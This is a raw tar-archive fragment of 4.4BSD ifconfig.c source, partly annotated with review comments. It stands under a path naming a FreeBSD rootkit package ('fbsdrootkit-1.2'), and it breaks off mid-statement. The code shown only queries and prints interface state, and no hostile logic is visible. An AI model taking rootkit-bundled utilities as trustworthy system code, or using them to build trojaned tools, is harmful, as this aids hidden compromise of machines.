		(*p->af_status)(0);
	}
}

/*
 * Print the inet line for the interface named by the global `name`:
 * address, destination (point-to-point interfaces), netmask and
 * broadcast address.  Every query goes through the shared global `ifr`
 * on socket `s`, so each ioctl overwrites the previous result; the order
 * of the statements matters.
 *
 * force: when the address query fails with EADDRNOTAVAIL or EAFNOSUPPORT,
 * a zero `force` returns without printing anything, a non-zero `force`
 * prints a zeroed address instead.
 *
 * NOTE(review): each strncpy() into ifr.ifr_name is bounded by the
 * destination size but does not NUL-terminate when `name` fills it.
 */
in_status(force)
	int force;
{
	struct sockaddr_in *sin;
	char *inet_ntoa();

	strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name));
	if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) {
		if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) {
			if (!force)
				return;
			bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr));
		} else
			/* Any other error is reported, then printing continues. */
			perror("ioctl (SIOCGIFADDR)");
	}
	sin = (struct sockaddr_in *)&ifr.ifr_addr;
	printf("\tinet %s ", inet_ntoa(sin->sin_addr));
	strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name));
	if (ioctl(s, SIOCGIFNETMASK, (caddr_t)&ifr) < 0) {
		if (errno != EADDRNOTAVAIL)
			perror("ioctl (SIOCGIFNETMASK)");
		/*
		 * Only ifr is zeroed here; the global netmask keeps its
		 * previous value and is what gets printed below.
		 */
		bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr));
	} else
		netmask.sin_addr =
		    ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr;
	if (flags & IFF_POINTOPOINT) {
		if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) {
			if (errno == EADDRNOTAVAIL)
			    bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr));
			else
			    perror("ioctl (SIOCGIFDSTADDR)");
		}
		strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name));
		sin = (struct sockaddr_in *)&ifr.ifr_dstaddr;
		printf("--> %s ", inet_ntoa(sin->sin_addr));
	}
	printf("netmask 0x%x ", ntohl(netmask.sin_addr.s_addr));
	if (flags & IFF_BROADCAST) {
		if (ioctl(s, SIOCGIFBRDADDR, (caddr_t)&ifr) < 0) {
			if (errno == EADDRNOTAVAIL)
			    bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr));
			else
			    /*
			     * NOTE(review): the label names SIOCGIFADDR although
			     * the failing request is SIOCGIFBRDADDR.
			     */
			    perror("ioctl (SIOCGIFADDR)");
		}
		strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name));
		sin = (struct sockaddr_in *)&ifr.ifr_addr;
		/* A zero broadcast address is not printed. */
		if (sin->sin_addr.s_addr != 0)
			printf("broadcast %s", inet_ntoa(sin->sin_addr));
	}
	putchar('\n');
}
xns_status(force) int force; { struct sockaddr_ns *sns; close(s); s = socket(AF_NS, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); sns = (struct sockaddr_ns *)&ifr.ifr_addr; printf("\tns %s ", ns_ntoa(sns->sns_addr)); if (flags & IFF_POINTOPOINT) { /* by W. Nesheim@Cornell */ if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else Perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sns = (struct sockaddr_ns *)&ifr.ifr_dstaddr; printf("--> %s ", ns_ntoa(sns->sns_addr)); } putchar('\n'); } iso_status(force) int force; { struct sockaddr_iso *siso; struct iso_ifreq ifr; close(s); s = socket(AF_ISO, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } bzero((caddr_t)&ifr, sizeof(ifr)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); } else { perror("ioctl (SIOCGIFADDR_ISO)"); exit(1); } } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); siso = &ifr.ifr_Addr; printf("\tiso %s ", iso_ntoa(&siso->siso_addr)); if (ioctl(s, SIOCGIFNETMASK_ISO, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK_ISO)"); } else { printf(" netmask %s ", iso_ntoa(&siso->siso_addr)); } if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); else Perror("ioctl (SIOCGIFDSTADDR_ISO)"); } 
strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); siso = &ifr.ifr_Addr; printf("--> %s ", iso_ntoa(&siso->siso_addr)); } putchar('\n'); } kread(addr, buf, size) u_long addr; char *buf; int size; { if (kvm_read(kvmd, addr, buf, size) != size) return (-1); return (0); } /* Unashamedly stolen from netstat -- maybe someday we can us sysctl() */ ether_status() { struct nlist nl[] = { { "_ifnet" } , "" }; u_long addr, addr2; struct ifnet ifnet; union { struct ifaddr ifa; struct in_ifaddr in; struct ns_ifaddr ns; struct iso_ifaddr iso; } ifaddr; char *cp; struct sockaddr *sa; struct sockaddr_dl *sdl; int n,m; char ifacename[IFNAMSIZ]; /* * If we fail here it probably means we don't have permission to * read /dev/kmem. Best to just silently bail out. If we have * an error *after* we succeed in opening /dev/kmem, then we * should report it. */ if ((kvmd = kvm_open(NULL,NULL,NULL,O_RDONLY,NULL)) == NULL) return; if (kvm_nlist(kvmd, nl) < 0 || nl[0].n_type == 0) { perror("ifconfig: kvm_nlist()"); return; } if (kread(nl[0].n_value, (char *)&addr, sizeof(addr))) { perror("_ifnet"); return; } addr2 = 0; while (addr || addr2) { if (addr2 == 0) { if (kread(addr, (char *)&ifnet, sizeof ifnet) || kread((u_long)ifnet.if_name, ifacename, IFNAMSIZ)){ perror("ifconfig: kvm_read()"); return; } addr = (u_long)ifnet.if_next; addr2 = (u_long)ifnet.if_addrlist; } if (kread(addr2, (char *)&ifaddr, sizeof ifaddr)) { addr2 = 0; continue; } sprintf(ifacename,"%s%d",ifacename, ifnet.if_unit); if (!strncmp(name, ifacename, strlen(name))) { #define CP(x) ((char *)(x)) cp = (CP(ifaddr.ifa.ifa_addr) - CP(addr2)) + CP(&ifaddr); sa = (struct sockaddr *)cp; if (sa->sa_family == AF_LINK) { sdl = (struct sockaddr_dl *)sa; cp = (char *)LLADDR(sdl); if ((n = sdl->sdl_alen) > 0) { printf ("\tether "); while (--n >= 0) m += printf("%02x%c", *cp++ & 0xff, n > 0 ? 
':' : ' '); putchar('\n'); } break; } } addr2 = (u_long)ifaddr.ifa.ifa_next; } kvm_close(kvmd); } Perror(cmd) char *cmd; { extern int errno; switch (errno) { case ENXIO: errx(1, "%s: no such interface", cmd); break; case EPERM: errx(1, "%s: permission denied", cmd); break; default: err(1, "%s", cmd); } } struct in_addr inet_makeaddr(); #define SIN(x) ((struct sockaddr_in *) &(x)) struct sockaddr_in *sintab[] = { SIN(ridreq.ifr_addr), SIN(addreq.ifra_addr), SIN(addreq.ifra_mask), SIN(addreq.ifra_broadaddr)}; in_getaddr(s, which) char *s; { register struct sockaddr_in *sin = sintab[which]; struct hostent *hp; struct netent *np; int val; sin->sin_len = sizeof(*sin); if (which != MASK) sin->sin_family = AF_INET; if (inet_aton(s, &sin->sin_addr)) ; else if (hp = gethostbyname(s)) bcopy(hp->h_addr, (char *)&sin->sin_addr, hp->h_length); else if (np = getnetbyname(s)) sin->sin_addr = inet_makeaddr(np->n_net, INADDR_ANY); else errx(1, "%s: bad value", s); } /* * Print a value a la the %b format of the kernel's printf */ printb(s, v, bits) char *s; register char *bits; register unsigned short v; { register int i, any = 0; register char c; if (bits && *bits == 8) printf("%s=%o", s, v); else printf("%s=%x", s, v); bits++; if (bits) { putchar('<'); while (i = *bits++) { if (v & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; (c = *bits) > 32; bits++) putchar(c); } else for (; *bits > 32; bits++) ; } putchar('>'); } } #define SNS(x) ((struct sockaddr_ns *) &(x)) struct sockaddr_ns *snstab[] = { SNS(ridreq.ifr_addr), SNS(addreq.ifra_addr), SNS(addreq.ifra_mask), SNS(addreq.ifra_broadaddr)}; xns_getaddr(addr, which) char *addr; { struct sockaddr_ns *sns = snstab[which]; struct ns_addr ns_addr(); sns->sns_family = AF_NS; sns->sns_len = sizeof(*sns); sns->sns_addr = ns_addr(addr); if (which == MASK) printf("Attempt to set XNS netmask will be ineffectual\n"); } #define SISO(x) ((struct sockaddr_iso *) &(x)) struct sockaddr_iso *sisotab[] = { SISO(iso_ridreq.ifr_Addr), 
SISO(iso_addreq.ifra_addr), SISO(iso_addreq.ifra_mask), SISO(iso_addreq.ifra_dstaddr)}; iso_getaddr(addr, which) char *addr; { register struct sockaddr_iso *siso = sisotab[which]; struct iso_addr *iso_addr(); siso->siso_addr = *iso_addr(addr); if (which == MASK) { siso->siso_len = TSEL(siso) - (caddr_t)(siso); siso->siso_nlen = 0; } else { siso->siso_len = sizeof(*siso); siso->siso_family = AF_ISO; } } setnsellength(val) char *val; { nsellength = atoi(val); if (nsellength < 0) errx(1, "Negative NSEL length is absurd"); if (afp == 0 || afp->af_af != AF_ISO) errx(1, "Setting NSEL length valid only for iso"); } fixnsel(s) register struct sockaddr_iso *s; { if (s->siso_family == 0) return; s->siso_tlen = nsellength; } adjust_nsellength() { fixnsel(sisotab[RIDADDR]); fixnsel(sisotab[ADDR]); fixnsel(sisotab[DSTADDR]); } fbsdrootkit-1.2/ifconfig/ifconfig.c.dist100600 764 764 52106 6247413132 15637 0ustar dfdf/* * Copyright (c) 1983, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. 
* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * 951109 - Andrew@pubnix.net - Changed to iterative buffer growing mechanism * for ifconfig -a so all interfaces are queried. * */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1993\n\ The Regents of the University of California. 
All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ifconfig.c 8.2 (Berkeley) 2/16/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #define NSIP #include #include #include #define EON #include #include #include #include #include #include #include #include #include #include #include #include #include struct ifreq ifr, ridreq; struct ifaliasreq addreq; struct iso_ifreq iso_ridreq; struct iso_aliasreq iso_addreq; struct sockaddr_in netmask; char name[30]; int flags; int metric; int mtu; int nsellength = 1; int setaddr; int setipdst; int doalias; int clearaddr; int newaddr = 1; int s; kvm_t *kvmd; extern int errno; int setifflags(), setifaddr(), setifdstaddr(), setifnetmask(); int setifmetric(), setifmtu(), setifbroadaddr(), setifipdst(); int notealias(), setsnpaoffset(), setnsellength(), notrailers(); #define NEXTARG 0xffffff struct cmd { char *c_name; int c_parameter; /* NEXTARG means next argv */ int (*c_func)(); } cmds[] = { { "up", IFF_UP, setifflags } , { "down", -IFF_UP, setifflags }, { "trailers", -1, notrailers }, { "-trailers", 1, notrailers }, { "arp", -IFF_NOARP, setifflags }, { "-arp", IFF_NOARP, setifflags }, { "debug", IFF_DEBUG, setifflags }, { "-debug", -IFF_DEBUG, setifflags }, { "alias", IFF_UP, notealias }, { "-alias", -IFF_UP, notealias }, { "delete", -IFF_UP, notealias }, #ifdef notdef #define EN_SWABIPS 0x1000 { "swabips", EN_SWABIPS, setifflags }, { "-swabips", -EN_SWABIPS, setifflags }, #endif { "netmask", NEXTARG, setifnetmask }, { "metric", NEXTARG, setifmetric }, { "broadcast", NEXTARG, setifbroadaddr }, { "ipdst", NEXTARG, setifipdst }, { "snpaoffset", NEXTARG, setsnpaoffset }, { "nsellength", NEXTARG, setnsellength }, { "link0", IFF_LINK0, setifflags }, { "-link0", -IFF_LINK0, setifflags }, { "link1", IFF_LINK1, setifflags }, { "-link1", -IFF_LINK1, setifflags }, { "link2", IFF_LINK2, setifflags }, { "-link2", -IFF_LINK2, setifflags }, { "normal", 
-IFF_LINK0, setifflags }, { "compress", IFF_LINK0, setifflags }, { "noicmp", IFF_LINK1, setifflags }, { "mtu", NEXTARG, setifmtu }, { 0, 0, setifaddr }, { 0, 0, setifdstaddr }, }; /* * XNS support liberally adapted from code written at the University of * Maryland principally by James O'Toole and Chris Torek. */ int in_status(), in_getaddr(); int xns_status(), xns_getaddr(); int iso_status(), iso_getaddr(); int ether_status(); /* Known address families */ struct afswtch { char *af_name; short af_af; int (*af_status)(); int (*af_getaddr)(); int af_difaddr; int af_aifaddr; caddr_t af_ridreq; caddr_t af_addreq; } afs[] = { #define C(x) ((caddr_t) &x) { "inet", AF_INET, in_status, in_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "ns", AF_NS, xns_status, xns_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "iso", AF_ISO, iso_status, iso_getaddr, SIOCDIFADDR_ISO, SIOCAIFADDR_ISO, C(iso_ridreq), C(iso_addreq) }, { "ether", AF_INET, ether_status, NULL }, { 0, 0, 0, 0 } }; struct afswtch *afp; /*the address family being set or asked about*/ main(argc, argv) int argc; char *argv[]; { int af = AF_INET; register struct afswtch *rafp; if (argc < 2) { fprintf(stderr, "usage: ifconfig interface\n%s%s%s%s%s%s", "\t[ af [ address [ dest_addr ] ] [ up ] [ down ]", "[ netmask mask ] ]\n", "\t[ metric n ]\n", "\t[ mtu n ]\n", "\t[ arp | -arp ]\n", "\t[ link0 | -link0 ] [ link1 | -link1 ] [ link2 | -link2 ] \n"); exit(1); } argc--, argv++; strncpy(name, *argv, sizeof(name)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); argc--, argv++; if (argc > 0) { for (afp = rafp = afs; rafp->af_name; rafp++) if (strcmp(rafp->af_name, *argv) == 0) { afp = rafp; argc--; argv++; break; } rafp = afp; af = ifr.ifr_addr.sa_family = rafp->af_af; } s = socket(af, SOCK_DGRAM, 0); if (s < 0) { perror("ifconfig: socket"); exit(1); } if (strstr(name, "-a")) { char *buffer; struct ifconf ifc; struct ifreq *ifptr, *end; int ifflags, selectflag = -1; int oldbufsize, bufsize = 
sizeof(struct ifreq); if (strstr(name, "-au")) selectflag = 1; if (strstr(name, "-ad")) selectflag = 0; buffer = malloc(bufsize); /* allocate first buffer */ ifc.ifc_len = bufsize; /* Initial setting */ /* * Itterate through here until we don't get any more data */ do { oldbufsize = ifc.ifc_len; bufsize += 1+sizeof(struct ifreq); buffer = realloc((void *)buffer, bufsize); ifc.ifc_len = bufsize; ifc.ifc_buf = buffer; if (ioctl(s, SIOCGIFCONF, (char *) &ifc) < 0) { perror("ifconfig (SIOCGIFCONF)"); exit (1); } } while (ifc.ifc_len > oldbufsize); ifflags = ifc.ifc_req->ifr_flags; end = (struct ifreq *) (ifc.ifc_buf + ifc.ifc_len); ifptr = ifc.ifc_req; while (ifptr < end) { sprintf(ifr.ifr_name,"%s",ifptr->ifr_name); sprintf(name,"%s",ifptr->ifr_name); close(s); if ((s = socket(af, SOCK_DGRAM, 0)) < 0) { perror("ifconfig: socket"); exit(1); } if (ifptr->ifr_flags == ifflags) ifconfig(argc,argv,af,rafp,selectflag); if(ifptr->ifr_addr.sa_len) /* Dohw! */ ifptr = (struct ifreq *) ((caddr_t) ifptr + ifptr->ifr_addr.sa_len - sizeof(struct sockaddr)); ifptr++; } free(buffer); } else ifconfig(argc,argv,af,rafp, -1); exit (0); } ifconfig(argc,argv,af,rafp,flag) int argc; char *argv[]; int af; struct afswtch *rafp; int flag; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } switch(flag) { case 0: if (ifr.ifr_flags & IFF_UP) return(0); break; case 1: if (!(ifr.ifr_flags & IFF_UP)) return(0); break; case -1: default: break; } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); flags = ifr.ifr_flags; if (ioctl(s, SIOCGIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMETRIC)"); else metric = ifr.ifr_metric; if (ioctl(s, SIOCGIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMTU)"); else mtu = ifr.ifr_mtu; if (argc == 0) { status(); return(0); } while (argc > 0) { register struct cmd *p; for (p = cmds; p->c_name; p++) if (strcmp(*argv, p->c_name) == 0) break; if (p->c_name == 0 && setaddr) p++; /* got src, do dst */ if (p->c_func) { if 
(p->c_parameter == NEXTARG) { if (argv[1] == NULL) errx(1, "'%s' requires argument", p->c_name); (*p->c_func)(argv[1]); argc--, argv++; } else (*p->c_func)(*argv, p->c_parameter); } argc--, argv++; } if (af == AF_ISO) adjust_nsellength(); if (setipdst && af==AF_NS) { struct nsip_req rq; int size = sizeof(rq); rq.rq_ns = addreq.ifra_addr; rq.rq_ip = addreq.ifra_dstaddr; if (setsockopt(s, 0, SO_NSIP_ROUTE, &rq, size) < 0) Perror("Encapsulation Routing"); } if (clearaddr) { int ret; strncpy(rafp->af_ridreq, name, sizeof ifr.ifr_name); if ((ret = ioctl(s, rafp->af_difaddr, rafp->af_ridreq)) < 0) { if (errno == EADDRNOTAVAIL && (doalias >= 0)) { /* means no previous address for interface */ } else Perror("ioctl (SIOCDIFADDR)"); } } if (newaddr) { strncpy(rafp->af_addreq, name, sizeof ifr.ifr_name); if (ioctl(s, rafp->af_aifaddr, rafp->af_addreq) < 0) Perror("ioctl (SIOCAIFADDR)"); } return(0); } #define RIDADDR 0 #define ADDR 1 #define MASK 2 #define DSTADDR 3 /*ARGSUSED*/ setifaddr(addr, param) char *addr; short param; { /* * Delay the ioctl to set the interface addr until flags are all set. * The address interpretation may depend on the flags, * and the flags may change when the address is set. */ setaddr++; if (doalias == 0) clearaddr = 1; (*afp->af_getaddr)(addr, (doalias >= 0 ? 
ADDR : RIDADDR)); } setifnetmask(addr) char *addr; { (*afp->af_getaddr)(addr, MASK); } setifbroadaddr(addr) char *addr; { (*afp->af_getaddr)(addr, DSTADDR); } setifipdst(addr) char *addr; { in_getaddr(addr, DSTADDR); setipdst++; clearaddr = 0; newaddr = 0; } #define rqtosa(x) (&(((struct ifreq *)(afp->x))->ifr_addr)) /*ARGSUSED*/ notealias(addr, param) char *addr; { if (setaddr && doalias == 0 && param < 0) bcopy((caddr_t)rqtosa(af_addreq), (caddr_t)rqtosa(af_ridreq), rqtosa(af_addreq)->sa_len); doalias = param; if (param < 0) { clearaddr = 1; newaddr = 0; } else clearaddr = 0; } /*ARGSUSED*/ notrailers(vname, value) char *vname; int value; { printf("Note: trailers are no longer sent, but always received\n"); } /*ARGSUSED*/ setifdstaddr(addr, param) char *addr; int param; { (*afp->af_getaddr)(addr, DSTADDR); } setifflags(vname, value) char *vname; short value; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); flags = ifr.ifr_flags; if (value < 0) { value = -value; flags &= ~value; } else flags |= value; ifr.ifr_flags = flags; if (ioctl(s, SIOCSIFFLAGS, (caddr_t)&ifr) < 0) Perror(vname); } setifmetric(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_metric = atoi(val); if (ioctl(s, SIOCSIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (set metric)"); } setifmtu(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_mtu = atoi(val); if (ioctl(s, SIOCSIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (set mtu)"); } setsnpaoffset(val) char *val; { iso_addreq.ifra_snpaoffset = atoi(val); } #define IFFBITS \ "\020\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING\10NOARP\ \11PROMISC\12ALLMULTI\13OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2\20MULTICAST" /* * Print the status of the interface. If an address family was * specified, show it and it only; otherwise, show them all. 
*/ status() { register struct afswtch *p = afp; short af = ifr.ifr_addr.sa_family; printf("%s: ", name); printb("flags", flags, IFFBITS); if (metric) printf(" metric %d", metric); if (mtu) printf(" mtu %d", mtu); putchar('\n'); if ((p = afp) != NULL) { (*p->af_status)(1); } else for (p = afs; p->af_name; p++) { ifr.ifr_addr.sa_family = p->af_af; (*p->af_status)(0); } } in_status(force) int force; { struct sockaddr_in *sin; char *inet_ntoa(); strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } sin = (struct sockaddr_in *)&ifr.ifr_addr; printf("\tinet %s ", inet_ntoa(sin->sin_addr)); strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); if (ioctl(s, SIOCGIFNETMASK, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK)"); bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else netmask.sin_addr = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr; if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sin = (struct sockaddr_in *)&ifr.ifr_dstaddr; printf("--> %s ", inet_ntoa(sin->sin_addr)); } printf("netmask 0x%x ", ntohl(netmask.sin_addr.s_addr)); if (flags & IFF_BROADCAST) { if (ioctl(s, SIOCGIFBRDADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sin = (struct sockaddr_in *)&ifr.ifr_addr; if (sin->sin_addr.s_addr != 0) printf("broadcast %s", inet_ntoa(sin->sin_addr)); } putchar('\n'); } xns_status(force) int force; { struct sockaddr_ns *sns; close(s); s = socket(AF_NS, SOCK_DGRAM, 0); if (s 
< 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); sns = (struct sockaddr_ns *)&ifr.ifr_addr; printf("\tns %s ", ns_ntoa(sns->sns_addr)); if (flags & IFF_POINTOPOINT) { /* by W. Nesheim@Cornell */ if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else Perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sns = (struct sockaddr_ns *)&ifr.ifr_dstaddr; printf("--> %s ", ns_ntoa(sns->sns_addr)); } putchar('\n'); } iso_status(force) int force; { struct sockaddr_iso *siso; struct iso_ifreq ifr; close(s); s = socket(AF_ISO, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } bzero((caddr_t)&ifr, sizeof(ifr)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); } else { perror("ioctl (SIOCGIFADDR_ISO)"); exit(1); } } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); siso = &ifr.ifr_Addr; printf("\tiso %s ", iso_ntoa(&siso->siso_addr)); if (ioctl(s, SIOCGIFNETMASK_ISO, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK_ISO)"); } else { printf(" netmask %s ", iso_ntoa(&siso->siso_addr)); } if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); else Perror("ioctl (SIOCGIFDSTADDR_ISO)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); siso = &ifr.ifr_Addr; printf("--> %s ", 
iso_ntoa(&siso->siso_addr)); } putchar('\n'); } kread(addr, buf, size) u_long addr; char *buf; int size; { if (kvm_read(kvmd, addr, buf, size) != size) return (-1); return (0); } /* Unashamedly stolen from netstat -- maybe someday we can us sysctl() */ ether_status() { struct nlist nl[] = { { "_ifnet" } , "" }; u_long addr, addr2; struct ifnet ifnet; union { struct ifaddr ifa; struct in_ifaddr in; struct ns_ifaddr ns; struct iso_ifaddr iso; } ifaddr; char *cp; struct sockaddr *sa; struct sockaddr_dl *sdl; int n,m; char ifacename[IFNAMSIZ]; /* * If we fail here it probably means we don't have permission to * read /dev/kmem. Best to just silently bail out. If we have * an error *after* we succeed in opening /dev/kmem, then we * should report it. */ if ((kvmd = kvm_open(NULL,NULL,NULL,O_RDONLY,NULL)) == NULL) return; if (kvm_nlist(kvmd, nl) < 0 || nl[0].n_type == 0) { perror("ifconfig: kvm_nlist()"); return; } if (kread(nl[0].n_value, (char *)&addr, sizeof(addr))) { perror("_ifnet"); return; } addr2 = 0; while (addr || addr2) { if (addr2 == 0) { if (kread(addr, (char *)&ifnet, sizeof ifnet) || kread((u_long)ifnet.if_name, ifacename, IFNAMSIZ)){ perror("ifconfig: kvm_read()"); return; } addr = (u_long)ifnet.if_next; addr2 = (u_long)ifnet.if_addrlist; } if (kread(addr2, (char *)&ifaddr, sizeof ifaddr)) { addr2 = 0; continue; } sprintf(ifacename,"%s%d",ifacename, ifnet.if_unit); if (!strncmp(name, ifacename, strlen(name))) { #define CP(x) ((char *)(x)) cp = (CP(ifaddr.ifa.ifa_addr) - CP(addr2)) + CP(&ifaddr); sa = (struct sockaddr *)cp; if (sa->sa_family == AF_LINK) { sdl = (struct sockaddr_dl *)sa; cp = (char *)LLADDR(sdl); if ((n = sdl->sdl_alen) > 0) { printf ("\tether "); while (--n >= 0) m += printf("%02x%c", *cp++ & 0xff, n > 0 ? 
